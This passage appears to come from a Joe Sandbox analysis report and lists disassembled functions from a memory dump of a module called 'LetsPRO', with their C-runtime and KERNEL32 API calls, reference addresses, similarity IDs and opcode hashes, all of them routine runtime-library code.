                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameterstrncmp
                                        • String ID:
                                        • API String ID: 2244377858-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??2@YAPAXI@Z.MSVCR100(000000C0,F3B6147F), ref: 6C946BDA
                                          • Part of subcall function 6C90235B: malloc.MSVCR100(?), ref: 6C902366
                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 6C946CD4
                                          • Part of subcall function 6C9496F4: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 6C949758
                                          • Part of subcall function 6C9496F4: GetLastError.KERNEL32(?,00000000), ref: 6C949765
                                          • Part of subcall function 6C9496F4: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 6C94977D
                                          • Part of subcall function 6C9496F4: _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,00000000), ref: 6C94978B
                                          • Part of subcall function 6C9496F4: GetLastError.KERNEL32(?,00000000), ref: 6C9497B2
                                          • Part of subcall function 6C9496F4: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 6C9497CA
                                          • Part of subcall function 6C9496F4: GetLastError.KERNEL32(?,00000000), ref: 6C9497ED
                                          • Part of subcall function 6C9496F4: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000), ref: 6C949805
                                          • Part of subcall function 6C9386CE: _memset.LIBCMT(?,00000000,0000000C,6C93870C), ref: 6C9386D3
                                        • GetLastError.KERNEL32 ref: 6C946C6C
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C946C85
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C946C94
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLast$ExceptionThrow$??2@CreateEventMultipleObjectsWait_memsetmalloc
                                        • String ID:
                                        • API String ID: 2739790103-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • QueryDepthSList.KERNEL32(80000000,-00000001,00000000,?,?,?,6C9393A7,00000000,?,00000000,6C93F7A3,00000000,00000000,00000000,00000000,00000000), ref: 6C943E34
                                        • InterlockedPushEntrySList.KERNEL32(80000008,-000000C8,?,6C9393A7,00000000,?,00000000,6C93F7A3,00000000,00000000,00000000,00000000,00000000,?,?,6C936887), ref: 6C943E4B
                                        • QueryDepthSList.KERNEL32(80000008,?,6C9393A7,00000000,?,00000000,6C93F7A3,00000000,00000000,00000000,00000000,00000000,?,?,6C936887,?), ref: 6C943E52
                                        • InterlockedFlushSList.KERNEL32(80000008,?,6C9393A7,00000000,?,00000000,6C93F7A3,00000000,00000000,00000000,00000000,00000000,?,?,6C936887,?), ref: 6C943E81
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: List$DepthInterlockedQuery$EntryFlushPush
                                        • String ID:
                                        • API String ID: 4063097673-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock.MSVCR100(00000001,6C90BC80,00000010,6C90BE52,6C90BE90,0000000C), ref: 6C90BC49
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • _malloc_crt.MSVCR100(00000038,6C90BC80,00000010,6C90BE52,6C90BE90,0000000C), ref: 6C928FB6
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,6C90BC80,00000010,6C90BE52,6C90BE90,0000000C), ref: 6C928FDE
                                        • free.MSVCR100(021F1FE8), ref: 6C928FF0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$CountEnterInitializeSpin_lock_malloc_crtfree
                                        • String ID:
                                        • API String ID: 954917037-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 6C90E360: DName::operator+.LIBCMT ref: 6C90E3CC
                                        • DName::operator+.LIBCMT ref: 6C90E482
                                        • DName::operator+.LIBCMT ref: 6C90E489
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator+
                                        • String ID:
                                        • API String ID: 2943138195-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C937808
                                        • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,00000024,6C945400,00000000,6C94550A,00000000,?,00000001,?,00000004,6C945DD3,?,?,00000000), ref: 6C93781B
                                          • Part of subcall function 6C93AEF0: __EH_prolog3.LIBCMT ref: 6C93AEF7
                                        • malloc.MSVCR100(00000001,?,00000024,6C945400,00000000,6C94550A,00000000,?,00000001,?,00000004,6C945DD3,?,?,00000000), ref: 6C937864
                                        • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100(?,00000024,6C945400,00000000,6C94550A,00000000,?,00000001,?,00000004,6C945DD3,?,?,00000000), ref: 6C9378B6
                                        • _freea_s.MSVCR100(00000000,?,00000024,6C945400,00000000,6C94550A,00000000,?,00000001,?,00000004,6C945DD3,?,?,00000000), ref: 6C9378CF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency@@$??0scoped_lock@critical_section@?unlock@critical_section@H_prolog3H_prolog3_V12@@_freea_smalloc
                                        • String ID:
                                        • API String ID: 911861471-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock_file.MSVCR100(?,?,?,?,?,?,?,6C911E58,0000000C), ref: 6C911DE7
                                        • __freebuf.LIBCMT ref: 6C911DF8
                                        • _malloc_crt.MSVCR100(?,?,?,?,?,?,?,6C911E58,0000000C), ref: 6C911E1E
                                        • _errno.MSVCR100(?,?,?,?,?,?,6C911E58,0000000C), ref: 6C928EDD
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6C911E58,0000000C), ref: 6C928EE8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __freebuf_errno_invalid_parameter_noinfo_lock_file_malloc_crt
                                        • String ID:
                                        • API String ID: 1322749186-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _domain_err.LIBCMT ref: 6C9978F3
                                          • Part of subcall function 6C997521: __ctrlfp.LIBCMT ref: 6C997530
                                          • Part of subcall function 6C997521: __except1.LIBCMT ref: 6C99754D
                                        • _y0.MSVCR100 ref: 6C997921
                                        Similarity
                                        • API ID: __ctrlfp__except1_domain_err
                                        • String ID:
                                        • API String ID: 2310245683-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetFileType.KERNEL32(?,?,?,6C978D00,0000000C), ref: 6C978C1C
                                        • GetLastError.KERNEL32(?,?,6C978D00,0000000C), ref: 6C978C26
                                        • __dosmaperr.LIBCMT(00000000,?,?,6C978D00,0000000C), ref: 6C978C2D
                                        • _errno.MSVCR100(?,?,6C978D00,0000000C), ref: 6C978C5D
                                        • __doserrno.MSVCR100(?,?,6C978D00,0000000C), ref: 6C978C68
                                        Similarity
                                        • API ID: ErrorFileLastType__doserrno__dosmaperr_errno
                                        • String ID:
                                        • API String ID: 3203400888-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C942F31
                                        • EnterCriticalSection.KERNEL32(?,00000028,6C93EFDA,00000000,?,00000000), ref: 6C942F3D
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6C942F62
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C942FBF
                                        • ??_V@YAXPAX@Z.MSVCR100(?), ref: 6C942FCD
                                        Similarity
                                        • API ID: CriticalSection$EnterH_prolog3Leave
                                        • String ID:
                                        • API String ID: 4250467438-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Similarity
                                        • API ID: _errno$__mbsrtowcs_helper_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2140840981-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcsnicoll_l.MSVCR100(?,?,?,00000000), ref: 6C910A95
                                        • _errno.MSVCR100 ref: 6C92C806
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C92C811
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
                                        • String ID:
                                        • API String ID: 1358483507-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _fileno.MSVCR100(?,?,?,6C91092E,?,6C910960,0000000C,6C910996,Function_00011644,?,?,00000000,?), ref: 6C910672
                                        • _isatty.MSVCR100(00000000,?,?,?,6C91092E,?,6C910960,0000000C,6C910996,Function_00011644,?,?,00000000,?), ref: 6C910678
                                        • __p__iob.MSVCR100(?,?,6C91092E,?,6C910960,0000000C,6C910996,Function_00011644,?,?,00000000,?), ref: 6C928A7D
                                        • _malloc_crt.MSVCR100(00001000,?,?,?,?,6C91092E,?,6C910960,0000000C,6C910996,Function_00011644,?,?,00000000,?), ref: 6C928AC1
                                        Similarity
                                        • API ID: __p__iob_fileno_isatty_malloc_crt
                                        • String ID:
                                        • API String ID: 301265415-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _fileno.MSVCR100(?,6C912620,00000008), ref: 6C9125A8
                                        • _lock_file.MSVCR100(?,?,6C912620,00000008), ref: 6C9125B0
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                          • Part of subcall function 6C90A5D5: _fileno.MSVCR100(?,?,?,?,?,?,?,6C90A870,?), ref: 6C90A604
                                          • Part of subcall function 6C90A5D5: _write.MSVCR100(00000000,?,?,?,?,?,?,6C90A870,?), ref: 6C90A60B
                                        • _lseek.MSVCR100(00000000,00000000,00000000,?,?,6C912620,00000008), ref: 6C9125FD
                                        • _errno.MSVCR100(6C912620,00000008), ref: 6C928EA6
                                        • _invalid_parameter_noinfo.MSVCR100(6C912620,00000008), ref: 6C928EB1
                                        Similarity
                                        • API ID: _fileno$_errno_invalid_parameter_noinfo_lock_lock_file_lseek_write
                                        • String ID:
                                        • API String ID: 2790466172-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(6C90BE90,0000000C), ref: 6C90BEB6
                                        • _invalid_parameter_noinfo.MSVCR100(6C90BE90,0000000C), ref: 6C9294F7
                                          • Part of subcall function 6C90BC34: _lock.MSVCR100(00000001,6C90BC80,00000010,6C90BE52,6C90BE90,0000000C), ref: 6C90BC49
                                        • _errno.MSVCR100(6C90BE90,0000000C), ref: 6C929503
                                        • _errno.MSVCR100(6C90BE90,0000000C), ref: 6C929510
                                        • @_EH4_CallFilterFunc@8.LIBCMT(6C9A4610,?,000000FE,6C90BE90,0000000C), ref: 6C929526
                                          • Part of subcall function 6C90BD17: _wsopen_s.MSVCR100(?,?,00000000,?,00000180,00000000,?,?), ref: 6C90BDE1
                                          • Part of subcall function 6C90BEAC: _unlock_file.MSVCR100(?,6C90BE86), ref: 6C90BEAF
                                        Similarity
                                        • API ID: _errno$CallFilterFunc@8_invalid_parameter_noinfo_lock_unlock_file_wsopen_s
                                        • String ID:
                                        • API String ID: 1609081514-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6C93080D
                                        • GetCurrentProcessId.KERNEL32 ref: 6C930819
                                        • GetCurrentThreadId.KERNEL32 ref: 6C930821
                                        • GetTickCount.KERNEL32 ref: 6C930829
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C930835
                                        Similarity
                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                        • String ID:
                                        • API String ID: 1445889803-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcslen.LIBCMT(?,6C912F28,00000010), ref: 6C912F0C
                                        • _lock_file.MSVCR100(?,?,6C912F28,00000010), ref: 6C912F17
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                        • _fputwc_nolock.MSVCR100(?,?,?,?,?,?,?,?,6C912F28,00000010), ref: 6C912F5C
                                        • _errno.MSVCR100(6C912F28,00000010), ref: 6C928739
                                        • _invalid_parameter_noinfo.MSVCR100(6C912F28,00000010), ref: 6C928744
                                        Similarity
                                        • API ID: _errno_fputwc_nolock_invalid_parameter_noinfo_lock_lock_file_wcslen
                                        • String ID:
                                        • API String ID: 674470822-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6C9276E1,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C94C3C2
                                        • free.MSVCR100(00000000,?,?,6C9276E1,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C94C3C5
                                        • DeleteCriticalSection.KERNEL32(00000002,?,?,6C9276E1,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C94C3EC
                                        • DecodePointer.KERNEL32(00000005,6C9276E1,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C94C768
                                        • TlsFree.KERNEL32(00000002,6C9276E1,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C94C786
                                        Similarity
                                        • API ID: CriticalDeleteSection$DecodeFreePointerfree
                                        • String ID:
                                        • API String ID: 1464103408-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLastError.KERNEL32(?,6C94793E,00000000,?), ref: 6C94799E
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,6C94793E,00000000,?), ref: 6C9479B6
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,6C94793E,00000000,?), ref: 6C9479C4
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,6C94793E,00000000,?), ref: 6C9479D0
                                        • GetLastError.KERNEL32(?,6C94793E,00000000,?), ref: 6C9479DD
                                        Similarity
                                        • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateEventExceptionThrow
                                        • String ID:
                                        • API String ID: 1718773336-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_wmemsetmemcpy
                                        • String ID:
                                        • API String ID: 286551074-0
                                        • Opcode ID: 4c47e15fd96f754e65bd220d429bcc62a976c3bac3cef8b486e782a40e3f284a
                                        • Instruction ID: eb7069d95d890de7058c865a05db4674568d6b66c43a8f46bcd4a8be5a25d909
                                        • Opcode Fuzzy Hash: 4c47e15fd96f754e65bd220d429bcc62a976c3bac3cef8b486e782a40e3f284a
                                        • Instruction Fuzzy Hash: 2501DF31651318EBCF329E04DC007EE3768EF05B68F11442AFD584AA94D775CA94DBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_memsetmemcpy
                                        • String ID:
                                        • API String ID: 2314827996-0
                                        • Opcode ID: 93e90c6a22b94a917288a195d90a0622ed6a6cfc10b69e2c5decfb7e63eb7a42
                                        • Instruction ID: 1b95d7111462c5f25bf80856acd94623b09d173903fb5df8453074bc4a3f61cc
                                        • Opcode Fuzzy Hash: 93e90c6a22b94a917288a195d90a0622ed6a6cfc10b69e2c5decfb7e63eb7a42
                                        • Instruction Fuzzy Hash: 0D01F231216318EFCF320E04DC04BDD3764AF05B68F11442AFC185AA91D77ACA94CBD2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • InterlockedFlushSList.KERNEL32(00000010,?,6C93FF6F), ref: 6C943BAB
                                        • InterlockedFlushSList.KERNEL32(00000018,?,6C93FF6F), ref: 6C943BB6
                                        • ??_V@YAXPAX@Z.MSVCR100(?,00000000,?,6C93FF6F), ref: 6C943BEF
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,00000000,?,6C93FF6F), ref: 6C943BF5
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,6C93FF6F), ref: 6C943C06
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: FlushInterlockedList$??3@
                                        • String ID:
                                        • API String ID: 964362523-0
                                        • Opcode ID: 45e123fc0c4d2d8f3153be9a95c2b6e1c07bdd8c22603c5e260b168eab7b84bb
                                        • Instruction ID: fb53c2ba85fd8c1c546ebabec8dfe345f732ee8ed653d72508810198cd10d25a
                                        • Opcode Fuzzy Hash: 45e123fc0c4d2d8f3153be9a95c2b6e1c07bdd8c22603c5e260b168eab7b84bb
                                        • Instruction Fuzzy Hash: AB0169362057419FD351EF74D8C0D6BB3A9BFB6318B21842DE16247E21CB31F849CA90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 6C940F88
                                        • GetLastError.KERNEL32 ref: 6C940F8F
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C940FA8
                                        • _CxxThrowException.MSVCR100(00000000,6C9A0D48,00000000), ref: 6C940FB7
                                        • CloseHandle.KERNEL32(?), ref: 6C940FBF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionHandleLastMultipleObjectsThrowWait
                                        • String ID:
                                        • API String ID: 1291167946-0
                                        • Opcode ID: 3f88cf4f133950d655fc0f3e177c6feeeb969bf51a7b2db9b502133b2e89da73
                                        • Instruction ID: 4f0f2660080e36b40c1bf4dae8675b615fac783397f3d58592de583dd3039cfb
                                        • Opcode Fuzzy Hash: 3f88cf4f133950d655fc0f3e177c6feeeb969bf51a7b2db9b502133b2e89da73
                                        • Instruction Fuzzy Hash: AD012B715042446BD7105A25CC40E5A77ACEFA1374F10C736F474C2AD0DB34E855D695
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?,?,6C97C50B,00000000,?,00000000), ref: 6C97E56D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C97C50B,00000000,?,00000000), ref: 6C97E577
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __get_sys_err_msg.LIBCMT ref: 6C97E58A
                                        • __cftoe.LIBCMT(00000000,?,?,00000000,000000FF,?,?,6C97C50B,00000000,?,00000000), ref: 6C97E598
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97E5B3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __cftoe__get_sys_err_msg__invoke_watson_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1727381857-0
                                        • Opcode ID: 26869b40d7f818274b5c90e262683fa130d4e9b567c3bb9c2d3b37b8e4061648
                                        • Instruction ID: c966709fc1a28a80d178a1e6c0624d596cedc94c9bf424b8e9911af7b22816cc
                                        • Opcode Fuzzy Hash: 26869b40d7f818274b5c90e262683fa130d4e9b567c3bb9c2d3b37b8e4061648
                                        • Instruction Fuzzy Hash: 66F0897554752CEFDF322E998C408DE362CAF25B28B204516F424C5E90FA31C69087F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?,6C9023BF,?,?,?,00000000,?), ref: 6C929408
                                        • _invalid_parameter_noinfo.MSVCR100(?,6C9023BF,?,?,?,00000000,?), ref: 6C929413
                                        • _errno.MSVCR100(?,?,6C9023BF,?,?,?,00000000,?), ref: 6C92941D
                                        • _errno.MSVCR100 ref: 6C929434
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C9023BF,?,?,?,00000000,?), ref: 6C92943F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2819658684-0
                                        • Opcode ID: 64d453ab774777d125229e37ca80b512f2348546d26f329b26ddc2f502b08f28
                                        • Instruction ID: 6eb79804db8f44d3f62c071a0c7e3b2b4f4c3f1816fc79b6f50e2250ef2be7e0
                                        • Opcode Fuzzy Hash: 64d453ab774777d125229e37ca80b512f2348546d26f329b26ddc2f502b08f28
                                        • Instruction Fuzzy Hash: F201F931A12619EBCF101F649C047DA3A68BF6133CF124659FC3846AE0CF79C050CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock_file.MSVCR100(?,6C912BD0,0000000C), ref: 6C912B96
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                        • _fread_nolock_s.MSVCR100(?,?,?,?,?,6C912BD0,0000000C), ref: 6C912BAE
                                          • Part of subcall function 6C912A9A: memcpy_s.MSVCR100(?,?,?,?), ref: 6C912B43
                                          • Part of subcall function 6C9126F0: _unlock_file.MSVCR100(6C912BC5,6C912BC5), ref: 6C9126F3
                                        • _memset.LIBCMT(?,00000000,000000FF,?,?,6C912BD0,0000000C), ref: 6C928D52
